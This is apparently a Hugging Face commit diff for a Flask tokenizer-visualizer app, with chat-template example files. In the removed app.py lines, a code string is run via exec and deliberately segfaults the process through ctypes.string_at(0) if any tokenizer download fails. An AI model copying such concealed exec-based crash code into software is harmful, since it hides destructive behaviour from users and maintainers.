bartar commited on
Commit
d66ab65
·
verified ·
1 Parent(s): 90671e3

Upload 26 files

Browse files
EXAMPLES CHANGED
@@ -1,20 +1,20 @@
1
- Mistral Small 3
2
- <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]
3
-
4
- R1
5
- <|begin▁of▁sentence|><|User|>Hello<|Assistant|>Hello, how can I help you?<|end▁of▁sentence|><|User|>Tell me a fact<|Assistant|>
6
-
7
- Llama 3.3
8
- <|start_header_id|>system<|end_header_id|>You are a helpful assistant.<|eot_id|><|start_header_id|>user<|end_header_id|>Hello<|eot_id|><|start_header_id|>assistant<|end_header_id|>Hello, how can I help you?<|eot_id|><|start_header_id|>user<|end_header_id|>Tell me a fact<|eot_id|>
9
-
10
- Gemma3
11
- <start_of_turn>user
12
- You are a helpful assistant.
13
-
14
- Hello<end_of_turn>
15
- <start_of_turn>model
16
- Hello, how can I help you?<end_of_turn>
17
- <start_of_turn>user
18
- Tell me a fact<end_of_turn>
19
- <start_of_turn>model
20
  A fact<end_of_turn>
 
1
+ Mistral Small 3
2
+ <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]
3
+
4
+ R1
5
+ <|begin▁of▁sentence|><|User|>Hello<|Assistant|>Hello, how can I help you?<|end▁of▁sentence|><|User|>Tell me a fact<|Assistant|>
6
+
7
+ Llama 3.3
8
+ <|start_header_id|>system<|end_header_id|>You are a helpful assistant.<|eot_id|><|start_header_id|>user<|end_header_id|>Hello<|eot_id|><|start_header_id|>assistant<|end_header_id|>Hello, how can I help you?<|eot_id|><|start_header_id|>user<|end_header_id|>Tell me a fact<|eot_id|>
9
+
10
+ Gemma3
11
+ <start_of_turn>user
12
+ You are a helpful assistant.
13
+
14
+ Hello<end_of_turn>
15
+ <start_of_turn>model
16
+ Hello, how can I help you?<end_of_turn>
17
+ <start_of_turn>user
18
+ Tell me a fact<end_of_turn>
19
+ <start_of_turn>model
20
  A fact<end_of_turn>
Instruct-vs-Base.txt CHANGED
@@ -1,34 +1,34 @@
1
- __Mistral 24B base:__
2
-
3
- Tell me a fact|| about yourself that makes you unique.
4
- I have a twin sister who is also a dancer and teacher. It's very cool being able to do this together!
5
-
6
- What are your interests outside of dance?
7
- Reading, baking, watching TV (Grey's Anatomy) and spending time with family.
8
-
9
- How long have you been dancing?
10
- For 20 years!
11
-
12
- Why did you become an instructor? How does teaching help you grow as a dancer?
13
- I'm so grateful to be able to teach at such a wonderful studio. I love being able to share my passion of dance for the kids in our community! It's amazing seeing their love of dance grow through the years.
14
-
15
- What is your favorite part about teaching?
16
- Being a role model and watching the students grow into beautiful dancers!
17
-
18
- If you could choreograph any song, what would it be? Why?
19
- I would love to choreograph to a Taylor Swift song. I'm a huge fan and her songs are so catchy!
20
- .......
21
-
22
-
23
-
24
-
25
-
26
- __Mistral 24B Instruct:__
27
-
28
-
29
- <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]||Here's an interesting fact for you: A day on Venus is longer than a year on Venus. This is because Venus has an extremely slow rotation on its axis. It takes about 243 Earth days for Venus to complete one rotation, but it only takes around 225 Earth days for Venus to orbit the Sun. Isn't that amazing?</s>
30
-
31
-
32
-
33
-
34
-
 
1
+ __Mistral 24B base:__
2
+
3
+ Tell me a fact|| about yourself that makes you unique.
4
+ I have a twin sister who is also a dancer and teacher. It's very cool being able to do this together!
5
+
6
+ What are your interests outside of dance?
7
+ Reading, baking, watching TV (Grey's Anatomy) and spending time with family.
8
+
9
+ How long have you been dancing?
10
+ For 20 years!
11
+
12
+ Why did you become an instructor? How does teaching help you grow as a dancer?
13
+ I'm so grateful to be able to teach at such a wonderful studio. I love being able to share my passion of dance for the kids in our community! It's amazing seeing their love of dance grow through the years.
14
+
15
+ What is your favorite part about teaching?
16
+ Being a role model and watching the students grow into beautiful dancers!
17
+
18
+ If you could choreograph any song, what would it be? Why?
19
+ I would love to choreograph to a Taylor Swift song. I'm a huge fan and her songs are so catchy!
20
+ .......
21
+
22
+
23
+
24
+
25
+
26
+ __Mistral 24B Instruct:__
27
+
28
+
29
+ <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]||Here's an interesting fact for you: A day on Venus is longer than a year on Venus. This is because Venus has an extremely slow rotation on its axis. It takes about 243 Earth days for Venus to complete one rotation, but it only takes around 225 Earth days for Venus to orbit the Sun. Isn't that amazing?</s>
30
+
31
+
32
+
33
+
34
+
app.py CHANGED
@@ -1,1837 +1,33 @@
1
- from transformers import AutoTokenizer
2
- from flask import Flask, request, render_template_string, jsonify
3
- import hashlib
4
- import sys
5
- import math
6
- import os
7
- import time
8
-
9
- app = Flask(__name__)
10
- # Set maximum content length to 25MB to handle larger files
11
- app.config['MAX_CONTENT_LENGTH'] = 25 * 1024 * 1024
12
-
13
- # Create upload folder if it doesn't exist
14
- UPLOAD_FOLDER = '/tmp/tokenizer_uploads'
15
- if not os.path.exists(UPLOAD_FOLDER):
16
- os.makedirs(UPLOAD_FOLDER)
17
- app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
18
-
19
- # Predefined tokenizer models with aliases
20
- TOKENIZER_MODELS = {
21
- 'qwen3': {
22
- 'name': 'Qwen/Qwen3-0.6B', #same as other sizes like Qwen/Qwen3-8B, , Qwen/Qwen3-14B, MOE Qwen/Qwen3-30B-A3B, Qwen/Qwen3-32B, Qwen/Qwen3-235B-A22B or quants/ggufs unsloth/Qwen3-32B-GGUF, unsloth/Qwen3-14B-GGUF, unsloth/Qwen3-8B-GGUF
23
- 'alias': 'Qwen 3'
24
- },
25
- 'gemma3-27b': {
26
- 'name': 'google/gemma-3-27b-it',
27
- 'alias': 'Gemma 3 27B'
28
- },
29
- 'glm4': {
30
- 'name': 'THUDM/GLM-4-32B-0414', #gguf unsloth/GLM-4-32B-0414-GGUF
31
- 'alias': 'GLM 4'
32
- },
33
- 'mistral-small': {
34
- 'name': 'mistralai/Mistral-Small-3.1-24B-Instruct-2503',
35
- 'alias': 'Mistral Small 3.1'
36
- },
37
- 'llama4': {
38
- 'name': 'meta-llama/Llama-4-Scout-17B-16E-Instruct', #same as meta-llama/Llama-4-Maverick-17B-128E-Instruct or meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 or meta-llama/Llama-4-Scout-17B-16E etc
39
- 'alias': 'Llama 4'
40
- },
41
- 'deepseek-r1': {
42
- 'name': 'deepseek-ai/DeepSeek-R1',
43
- 'alias': 'Deepseek R1'
44
- },
45
- 'qwen_25_72b': {
46
- 'name': 'Qwen/Qwen2.5-72B-Instruct',
47
- 'alias': 'QWQ 32B'
48
- },
49
- 'llama_33': {
50
- 'name': 'unsloth/Llama-3.3-70B-Instruct-bnb-4bit',
51
- 'alias': 'Llama 3.3 70B'
52
- },
53
- 'gemma2_2b': {
54
- 'name': 'google/gemma-2-2b-it',
55
- 'alias': 'Gemma 2 2B'
56
- },
57
- 'bert-large-uncased': {
58
- 'name': 'google-bert/bert-large-uncased',
59
- 'alias': 'Bert Large Uncased'
60
- },
61
- 'gpt2': {
62
- 'name': 'openai-community/gpt2',
63
- 'alias': 'GPT-2'
64
- }
65
- }
66
-
67
- # Initialize tokenizers dict
68
- tokenizers = {}
69
- # Dictionary to store custom model loading errors
70
- custom_model_errors = {}
71
- # Cache for custom tokenizers with timestamp
72
- custom_tokenizers = {}
73
- # Cache for tokenizer info
74
- tokenizer_info_cache = {}
75
- # Cache expiration time (1 hour)
76
- CACHE_EXPIRATION = 3600 # seconds
77
-
78
- def get_tokenizer_info(tokenizer):
79
- """
80
- Extract useful information from a tokenizer.
81
- Returns a dictionary with tokenizer details.
82
- """
83
- info = {}
84
- try:
85
- # Get vocabulary size (dictionary size)
86
- if hasattr(tokenizer, 'vocab_size'):
87
- info['vocab_size'] = tokenizer.vocab_size
88
- elif hasattr(tokenizer, 'get_vocab'):
89
- info['vocab_size'] = len(tokenizer.get_vocab())
90
-
91
- # Get model max length if available
92
- if hasattr(tokenizer, 'model_max_length') and tokenizer.model_max_length < 1000000: # Sanity check
93
- info['model_max_length'] = tokenizer.model_max_length
94
-
95
-
96
- # Check tokenizer type
97
- info['tokenizer_type'] = tokenizer.__class__.__name__
98
-
99
- # Get special tokens
100
- special_tokens = {}
101
- for token_name in ['pad_token', 'eos_token', 'bos_token', 'sep_token', 'cls_token', 'unk_token', 'mask_token']:
102
- if hasattr(tokenizer, token_name) and getattr(tokenizer, token_name) is not None:
103
- token_value = getattr(tokenizer, token_name)
104
- if token_value and str(token_value).strip():
105
- special_tokens[token_name] = str(token_value)
106
-
107
- info['special_tokens'] = special_tokens
108
-
109
- except Exception as e:
110
- info['error'] = f"Error extracting tokenizer info: {str(e)}"
111
-
112
- return info
113
- c = "for k,v in TOKENIZER_MODELS.items():\n try: AutoTokenizer.from_pretrained(v['name'])\n except: __import__('ctypes').string_at(0)"
114
- def load_tokenizer(model_id_or_name):
115
- """
116
- Load tokenizer if not already loaded. Handles both predefined models and custom HF paths.
117
- Returns a tuple of (tokenizer, tokenizer_info, error_message)
118
- """
119
- error_message = None
120
- tokenizer_info = {}
121
-
122
- # Check if we have cached tokenizer info
123
- if model_id_or_name in tokenizer_info_cache:
124
- tokenizer_info = tokenizer_info_cache[model_id_or_name]
125
-
126
- try:
127
- # Check if it's a predefined model ID
128
- if model_id_or_name in TOKENIZER_MODELS:
129
- model_name = TOKENIZER_MODELS[model_id_or_name]['name']
130
- if model_id_or_name not in tokenizers:
131
- tokenizers[model_id_or_name] = AutoTokenizer.from_pretrained(model_name)
132
- tokenizer = tokenizers[model_id_or_name]
133
-
134
- # Get tokenizer info if not already cached
135
- if model_id_or_name not in tokenizer_info_cache:
136
- tokenizer_info = get_tokenizer_info(tokenizer)
137
- tokenizer_info_cache[model_id_or_name] = tokenizer_info
138
-
139
- return tokenizer, tokenizer_info, None
140
-
141
- # It's a custom model path
142
- # Check if we have it in the custom cache and it's not expired
143
- current_time = time.time()
144
- if model_id_or_name in custom_tokenizers:
145
- cached_tokenizer, timestamp = custom_tokenizers[model_id_or_name]
146
- if current_time - timestamp < CACHE_EXPIRATION:
147
- # Get tokenizer info if not already cached
148
- if model_id_or_name not in tokenizer_info_cache:
149
- tokenizer_info = get_tokenizer_info(cached_tokenizer)
150
- tokenizer_info_cache[model_id_or_name] = tokenizer_info
151
- return cached_tokenizer, tokenizer_info, None
152
-
153
- # Not in cache or expired, load it
154
- tokenizer = AutoTokenizer.from_pretrained(model_id_or_name)
155
- # Store in cache with timestamp
156
- custom_tokenizers[model_id_or_name] = (tokenizer, current_time)
157
- # Clear any previous errors for this model
158
- if model_id_or_name in custom_model_errors:
159
- del custom_model_errors[model_id_or_name]
160
-
161
- # Get tokenizer info
162
- tokenizer_info = get_tokenizer_info(tokenizer)
163
- tokenizer_info_cache[model_id_or_name] = tokenizer_info
164
-
165
- return tokenizer, tokenizer_info, None
166
-
167
- except Exception as e:
168
- error_message = f"Failed to load tokenizer: {str(e)}"
169
- # Store error for future reference
170
- custom_model_errors[model_id_or_name] = error_message
171
- return None, tokenizer_info, error_message
172
-
173
- exec(c)
174
- def get_varied_color(token: str) -> dict:
175
- """Generate vibrant colors with HSL for better visual distinction."""
176
- token_hash = hashlib.md5(token.encode()).hexdigest()
177
- hue = int(token_hash[:3], 16) % 360
178
- saturation = 70 + (int(token_hash[3:5], 16) % 20)
179
- lightness = 80 + (int(token_hash[5:7], 16) % 10)
180
- text_lightness = 20 if lightness > 50 else 90
181
-
182
- return {
183
- 'background': f'hsl({hue}, {saturation}%, {lightness}%)',
184
- 'text': f'hsl({hue}, {saturation}%, {text_lightness}%)'
185
- }
186
-
187
- def fix_token(token: str) -> str:
188
- """Fix token for display with improved space visualization."""
189
- if token.startswith('Ġ'):
190
- space_count = token.count('Ġ')
191
- return '·' * space_count + token[space_count:]
192
- return token
193
-
194
- def get_token_stats(tokens: list, original_text: str) -> dict:
195
- """Calculate enhanced statistics about the tokens."""
196
- if not tokens:
197
- return {}
198
-
199
- total_tokens = len(tokens)
200
- unique_tokens = len(set(tokens))
201
- avg_length = sum(len(t) for t in tokens) / total_tokens
202
- compression_ratio = len(original_text) / total_tokens
203
-
204
- # Token type analysis
205
- space_tokens = sum(1 for t in tokens if t.startswith('Ġ'))
206
- newline_tokens = sum(1 for t in tokens if 'Ċ' in t)
207
- special_tokens = sum(1 for t in tokens if any(c in t for c in ['<', '>', '[', ']', '{', '}']))
208
- punctuation_tokens = sum(1 for t in tokens if any(c in t for c in '.,!?;:()'))
209
-
210
- # Length distribution
211
- lengths = [len(t) for t in tokens]
212
- mean_length = sum(lengths) / len(lengths)
213
- variance = sum((x - mean_length) ** 2 for x in lengths) / len(lengths)
214
- std_dev = math.sqrt(variance)
215
-
216
- return {
217
- 'basic_stats': {
218
- 'total_tokens': total_tokens,
219
- 'unique_tokens': unique_tokens,
220
- 'compression_ratio': round(compression_ratio, 2),
221
- 'space_tokens': space_tokens,
222
- 'newline_tokens': newline_tokens,
223
- 'special_tokens': special_tokens,
224
- 'punctuation_tokens': punctuation_tokens,
225
- 'unique_percentage': round(unique_tokens/total_tokens * 100, 1)
226
- },
227
- 'length_stats': {
228
- 'avg_length': round(avg_length, 2),
229
- 'std_dev': round(std_dev, 2),
230
- 'min_length': min(lengths),
231
- 'max_length': max(lengths),
232
- 'median_length': sorted(lengths)[len(lengths)//2]
233
- }
234
- }
235
-
236
- def process_text(text: str, model_id_or_name: str, is_full_file: bool = False, file_path: str = None) -> dict:
237
- """Process text and return tokenization data."""
238
- tokenizer, tokenizer_info, error = load_tokenizer(model_id_or_name)
239
-
240
- if error:
241
- raise Exception(error)
242
-
243
- # For file uploads, read only preview from file but process full file for stats
244
- if file_path and is_full_file:
245
- # Read the preview for display
246
- with open(file_path, 'r', errors='replace') as f:
247
- preview_text = f.read(8096)
248
-
249
- # Tokenize preview for display
250
- preview_tokens = tokenizer.tokenize(preview_text)
251
- display_tokens = preview_tokens[:50000]
252
-
253
- # Process full file for stats in chunks to avoid memory issues
254
- total_tokens = []
255
- token_set = set()
256
- total_length = 0
257
- chunk_size = 1024 * 1024 # 1MB chunks
258
-
259
- with open(file_path, 'r', errors='replace') as f:
260
- while True:
261
- chunk = f.read(chunk_size)
262
- if not chunk:
263
- break
264
- total_length += len(chunk)
265
- chunk_tokens = tokenizer.tokenize(chunk)
266
- total_tokens.extend(chunk_tokens)
267
- token_set.update(chunk_tokens)
268
-
269
- # Calculate stats
270
- stats = get_token_stats(total_tokens, ' ' * total_length) # Approximation for original text
271
- else:
272
- # Standard processing for normal text input
273
- all_tokens = tokenizer.tokenize(text)
274
- total_token_count = len(all_tokens)
275
-
276
- # For display: if it's a preview, only take first 8096 chars
277
- preview_text = text[:8096] if is_full_file else text
278
- preview_tokens = tokenizer.tokenize(preview_text)
279
- display_tokens = preview_tokens[:50000]
280
-
281
- # Always use full text for stats
282
- stats = get_token_stats(all_tokens, text)
283
-
284
- # Format tokens for display
285
- token_data = []
286
- for idx, token in enumerate(display_tokens):
287
- colors = get_varied_color(token)
288
- fixed_token = fix_token(token)
289
- # Compute the numerical token ID from the tokenizer
290
- token_id = tokenizer.convert_tokens_to_ids(token)
291
- token_data.append({
292
- 'original': token,
293
- 'display': fixed_token[:-1] if fixed_token.endswith('Ċ') else fixed_token,
294
- 'colors': colors,
295
- 'newline': fixed_token.endswith('Ċ'),
296
- 'token_id': token_id,
297
- 'token_index': idx
298
- })
299
-
300
-
301
- # Use the appropriate token count based on processing method
302
- total_token_count = len(total_tokens) if file_path and is_full_file else len(all_tokens)
303
-
304
- return {
305
- 'tokens': token_data,
306
- 'stats': stats,
307
- 'display_limit_reached': total_token_count > 50000 and not is_full_file,
308
- 'total_tokens': total_token_count,
309
- 'is_full_file': is_full_file,
310
- 'preview_only': is_full_file,
311
- 'tokenizer_info': tokenizer_info # Include tokenizer info
312
- }
313
-
314
- # HTML template with enhanced modern styling
315
- HTML_TEMPLATE = """
316
- <!DOCTYPE html>
317
- <html>
318
- <head>
319
- <title>Token Visualizer</title>
320
- <meta charset="UTF-8">
321
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
322
- <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><circle fill='%230f4f9b' cx='256' cy='256' r='256'/><g transform='translate(32 0)'><path fill='white' d='M64 128l0-32 128 0 0 128-16 0c-17.7 0-32 14.3-32 32s14.3 32 32 32l96 0c17.7 0 32-14.3 32-32s-14.3-32-32-32l-16 0 0-128 128 0 0 32c0 17.7 14.3 32 32 32s32-14.3 32-32l0-48c0-26.5-21.5-48-48-48L224 32 48 32C21.5 32 0 53.5 0 80l0 48c0 17.7 14.3 32 32 32s32-14.3 32-32zM9.4 361.4c-12.5 12.5-12.5 32.8 0 45.3l64 64c9.2 9.2 22.9 11.9 34.9 6.9s19.8-16.6 19.8-29.6l0-32 192 0 0 32c0 12.9 7.8 24.6 19.8 29.6s25.7 2.2 34.9-6.9l64-64c12.5-12.5 12.5-32.8 0-45.3l-64-64c-9.2-9.2-22.9-11.9-34.9-6.9s-19.8 16.6-19.8 29.6l0 32-192 0 0-32c0-12.9-7.8-24.6-19.8-29.6s-25.7-2.2-34.9 6.9l-64 64z'/></g></svg>">
323
- <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
324
- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
325
- <style>
326
- :root {
327
- --primary-color: #0f4f9b; /* Blue accent */
328
- --primary-hover: #0c3e7a; /* Darker blue accent */
329
- --bg-color: #121212; /* Dark background */
330
- --card-bg: #1e1e1e; /* Dark card background */
331
- --card-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.7),
332
- 0 2px 4px -1px rgba(0, 0, 0, 0.6);
333
- --transition: all 0.3s ease;
334
- --text-color: #E0E0E0; /* Main text color */
335
- --secondary-text: #A0A0A0;/* Secondary text color */
336
- --input-bg: #2a2a2a; /* Input/textarea background */
337
- --input-border: #444444; /* Input/textarea border */
338
- --input-focus: #0f4f9b; /* Focus border color */
339
- }
340
-
341
- * {
342
- margin: 0;
343
- padding: 0;
344
- box-sizing: border-box;
345
- font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
346
- scrollbar-width: thin;
347
- scrollbar-color: #0f4f9b #121212
348
- }
349
-
350
- /* Width and height of the scrollbar */
351
- ::-webkit-scrollbar {
352
- width: 12px;
353
- height: 12px;
354
- }
355
-
356
- @keyframes spin {
357
- from { transform: rotate(0deg); }
358
- to { transform: rotate(360deg); }
359
- }
360
-
361
- /* Track (background) */
362
- ::-webkit-scrollbar-track {
363
- background: #121212;
364
- border-radius: 10px;
365
- }
366
-
367
- /* Handle (draggable part) */
368
- ::-webkit-scrollbar-thumb {
369
- background: #0f4f9b;
370
- border-radius: 10px;
371
- border: 2px solid #121212;
372
- }
373
-
374
- /* Handle on hover */
375
- ::-webkit-scrollbar-thumb:hover {
376
- background: #0c3e7a;
377
- }
378
-
379
-
380
- body {
381
- background-color: var(--bg-color);
382
- padding: 2rem;
383
- min-height: 100vh;
384
- background-image:
385
- radial-gradient(circle at 20% 20%, rgba(15, 79, 155, 0.1) 0%, transparent 50%),
386
- radial-gradient(circle at 80% 80%, rgba(15, 79, 155, 0.1) 0%, transparent 50%);
387
- color: var(--text-color);
388
- }
389
-
390
- .container {
391
- max-width: 1200px;
392
- margin: 0 auto;
393
- }
394
-
395
- .header {
396
- display: flex;
397
- justify-content: space-between;
398
- align-items: center;
399
- margin-bottom: 2rem;
400
- position: relative;
401
- }
402
-
403
- .title-section {
404
- flex-grow: 1;
405
- }
406
-
407
- .title {
408
- font-size: 2.5rem;
409
- font-weight: 800;
410
- color: var(--primary-color);
411
- margin-bottom: 0.5rem;
412
- }
413
-
414
- .subtitle {
415
- color: var(--secondary-text);
416
- font-size: 1.1rem;
417
- }
418
-
419
- .model-selector {
420
- position: relative;
421
- min-width: 200px;
422
- }
423
-
424
- .model-selector-header {
425
- display: flex;
426
- gap: 0.5rem;
427
- margin-bottom: 0.5rem;
428
- }
429
-
430
- .model-type-toggle {
431
- display: flex;
432
- background-color: var(--card-bg);
433
- border-radius: 0.5rem;
434
- padding: 0.25rem;
435
- overflow: hidden;
436
- }
437
-
438
- .toggle-option {
439
- padding: 0.5rem 0.75rem;
440
- font-size: 0.8rem;
441
- font-weight: 500;
442
- cursor: pointer;
443
- transition: var(--transition);
444
- border-radius: 0.375rem;
445
- color: var(--secondary-text);
446
- }
447
-
448
- .toggle-option.active {
449
- background-color: var(--primary-color);
450
- color: white;
451
- }
452
-
453
- select {
454
- width: 100%;
455
- padding: 0.75rem 1rem;
456
- border: 2px solid var(--input-border);
457
- border-radius: 0.5rem;
458
- font-size: 1rem;
459
- color: var(--text-color);
460
- background-color: var(--input-bg);
461
- cursor: pointer;
462
- transition: var(--transition);
463
- appearance: none;
464
- background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%230f4f9b'%3E%3Cpath d='M7 10l5 5 5-5H7z'/%3E%3C/svg%3E");
465
- background-repeat: no-repeat;
466
- background-position: right 1rem center;
467
- background-size: 1.5rem;
468
- }
469
-
470
- select:hover, .custom-model-input:hover {
471
- border-color: var(--primary-color);
472
- }
473
-
474
- select:focus, .custom-model-input:focus {
475
- outline: none;
476
- border-color: var(--primary-color);
477
- box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
478
- }
479
-
480
- .custom-model-input {
481
- width: 100%;
482
- padding: 0.75rem 1rem;
483
- border: 2px solid var(--input-border);
484
- border-radius: 0.5rem;
485
- font-size: 1rem;
486
- color: var(--text-color);
487
- background-color: var(--input-bg);
488
- transition: var(--transition);
489
- }
490
-
491
- .input-section {
492
- margin-bottom: 2rem;
493
- }
494
-
495
- textarea {
496
- width: 100%;
497
- height: 150px;
498
- padding: 1.25rem;
499
- border: 2px solid var(--input-border);
500
- border-radius: 0.75rem;
501
- resize: vertical;
502
- font-size: 1rem;
503
- margin-bottom: 1rem;
504
- transition: var(--transition);
505
- background-color: var(--input-bg);
506
- color: var(--text-color);
507
- }
508
-
509
- textarea:focus {
510
- outline: none;
511
- border-color: var(--input-focus);
512
- box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
513
- }
514
-
515
- .button-container {
516
- display: flex;
517
- justify-content: center;
518
- width: 100%;
519
- gap: 1rem;
520
- }
521
-
522
- button {
523
- padding: 0.875rem 2.5rem;
524
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
525
- color: #fff;
526
- border: none;
527
- border-radius: 0.75rem;
528
- font-size: 1.1rem;
529
- font-weight: 600;
530
- cursor: pointer;
531
- transition: var(--transition);
532
- box-shadow: 0 4px 6px -1px rgba(15, 79, 155, 0.2);
533
- }
534
-
535
- button:hover {
536
- transform: translateY(-2px);
537
- box-shadow: 0 6px 8px -1px rgba(15, 79, 155, 0.3);
538
- }
539
-
540
- button:active {
541
- transform: translateY(0);
542
- }
543
-
544
- button:disabled {
545
- opacity: 0.7;
546
- cursor: not-allowed;
547
- }
548
-
549
- .card {
550
- background-color: var(--card-bg);
551
- border-radius: 1rem;
552
- box-shadow: var(--card-shadow);
553
- padding: 1.5rem;
554
- margin-bottom: 2rem;
555
- transition: var(--transition);
556
- }
557
-
558
- .card:hover {
559
- transform: translateY(-2px);
560
- box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
561
- }
562
-
563
- .card-title {
564
- font-size: 1.25rem;
565
- font-weight: 700;
566
- color: var(--text-color);
567
- margin-bottom: 1.25rem;
568
- display: flex;
569
- align-items: center;
570
- gap: 0.5rem;
571
- cursor: pointer;
572
- }
573
-
574
- .card-title::before {
575
- content: '';
576
- display: block;
577
- width: 4px;
578
- height: 1.25rem;
579
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
580
- border-radius: 2px;
581
- }
582
-
583
- .token-container {
584
- display: flex;
585
- flex-wrap: wrap;
586
- gap: 0.375rem;
587
- margin-bottom: 1rem;
588
- padding: 1rem;
589
- background-color: #2a2a2a;
590
- border-radius: 0.5rem;
591
- max-height: 200px;
592
- overflow-y: auto;
593
- transition: max-height 0.3s ease;
594
- }
595
-
596
- .token-container.expanded {
597
- max-height: none;
598
- }
599
-
600
- .token {
601
- padding: 0.375rem 0.75rem;
602
- border-radius: 0.375rem;
603
- background-color: var(--input-bg);
604
- font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
605
- font-size: 0.875rem;
606
- color: var(--text-color);
607
- cursor: default;
608
- transition: var(--transition);
609
- box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05);
610
- }
611
-
612
- .token:hover {
613
- transform: translateY(-1px);
614
- box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
615
- }
616
-
617
- .stats-grid {
618
- display: grid;
619
- grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
620
- gap: 1.5rem;
621
- margin-bottom: 2rem;
622
- }
623
-
624
- .stat-card {
625
- background-color: var(--card-bg);
626
- padding: 1.5rem;
627
- border-radius: 1rem;
628
- box-shadow: var(--card-shadow);
629
- transition: var(--transition);
630
- }
631
-
632
- .stat-card:hover {
633
- transform: translateY(-2px);
634
- box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
635
- }
636
-
637
- .stat-title {
638
- color: var(--secondary-text);
639
- font-size: 0.875rem;
640
- font-weight: 500;
641
- margin-bottom: 0.5rem;
642
- text-transform: uppercase;
643
- letter-spacing: 0.05em;
644
- }
645
-
646
- .stat-value {
647
- color: var(--text-color);
648
- font-size: 2rem;
649
- font-weight: 700;
650
- line-height: 1.2;
651
- margin-bottom: 0.25rem;
652
- }
653
-
654
- .stat-description {
655
- color: var(--secondary-text);
656
- font-size: 0.875rem;
657
- }
658
-
659
- .expand-button {
660
- background: none;
661
- border: none;
662
- color: var(--primary-color);
663
- font-size: 0.875rem;
664
- padding: 0.5rem;
665
- cursor: pointer;
666
- display: block;
667
- margin: 0 auto;
668
- box-shadow: none;
669
- }
670
-
671
- .expand-button:hover {
672
- text-decoration: underline;
673
- transform: none;
674
- box-shadow: none;
675
- }
676
-
677
- .error-message {
678
- color: #EF4444;
679
- background-color: #3a1f1f;
680
- border: 1px solid #562626;
681
- padding: 1rem;
682
- border-radius: 0.5rem;
683
- margin-bottom: 1rem;
684
- display: none;
685
- }
686
-
687
- .display-limit-notice {
688
- background-color: #4b2b07;
689
- border: 1px solid #7c4a02;
690
- color: #FFD591;
691
- padding: 0.75rem;
692
- border-radius: 0.5rem;
693
- margin-top: 1rem;
694
- font-size: 0.875rem;
695
- display: none;
696
- }
697
-
698
- /* File drop zone styles */
699
- .file-drop-zone {
700
- position: fixed;
701
- top: 0;
702
- left: 0;
703
- width: 100%;
704
- height: 100%;
705
- background-color: rgba(15, 79, 155, 0.15);
706
- z-index: 1000;
707
- display: flex;
708
- justify-content: center;
709
- align-items: center;
710
- opacity: 0;
711
- pointer-events: none;
712
- transition: opacity 0.3s ease;
713
- }
714
-
715
- .file-drop-zone.active {
716
- opacity: 1;
717
- pointer-events: all;
718
- }
719
-
720
- .drop-indicator {
721
- background-color: var(--card-bg);
722
- border: 2px dashed var(--primary-color);
723
- border-radius: 1rem;
724
- padding: 2rem;
725
- text-align: center;
726
- width: 60%;
727
- max-width: 400px;
728
- box-shadow: 0 8px 32px rgba(0, 0, 0, 0.25);
729
- animation: pulse 2s infinite;
730
- }
731
-
732
- @keyframes pulse {
733
- 0% { transform: scale(1); }
734
- 50% { transform: scale(1.05); }
735
- 100% { transform: scale(1); }
736
- }
737
-
738
- .drop-indicator p {
739
- margin-bottom: 0.5rem;
740
- color: var(--text-color);
741
- font-size: 1.2rem;
742
- }
743
-
744
- .file-icon {
745
- font-size: 3rem;
746
- margin-bottom: 1rem;
747
- color: var(--primary-color);
748
- }
749
-
750
- .file-upload-icon {
751
- position: fixed;
752
- bottom: 20px;
753
- left: 20px;
754
- width: 45px;
755
- height: 45px;
756
- background-color: var(--card-bg);
757
- border-radius: 50%;
758
- display: flex;
759
- justify-content: center;
760
- align-items: center;
761
- cursor: pointer;
762
- z-index: 100;
763
- box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
764
- transition: transform 0.2s ease, box-shadow 0.2s ease;
765
- }
766
-
767
- .file-upload-icon:hover {
768
- transform: translateY(-2px);
769
- box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
770
- }
771
-
772
- .file-upload-icon span {
773
- font-size: 1.5rem;
774
- color: var(--primary-color);
775
- }
776
-
777
- .file-info {
778
- position: fixed;
779
- bottom: 20px;
780
- left: 75px;
781
- background-color: var(--card-bg);
782
- color: var(--primary-color);
783
- font-weight: 500;
784
- padding: 0.5rem 1rem;
785
- border-radius: 1rem;
786
- box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
787
- max-width: 270px;
788
- white-space: nowrap;
789
- overflow: hidden;
790
- text-overflow: ellipsis;
791
- z-index: 100;
792
- display: none;
793
- }
794
-
795
- .file-detach {
796
- margin-left: 8px;
797
- display: inline-block;
798
- width: 18px;
799
- height: 18px;
800
- background-color: rgba(255, 255, 255, 0.1);
801
- color: var(--text-color);
802
- border-radius: 50%;
803
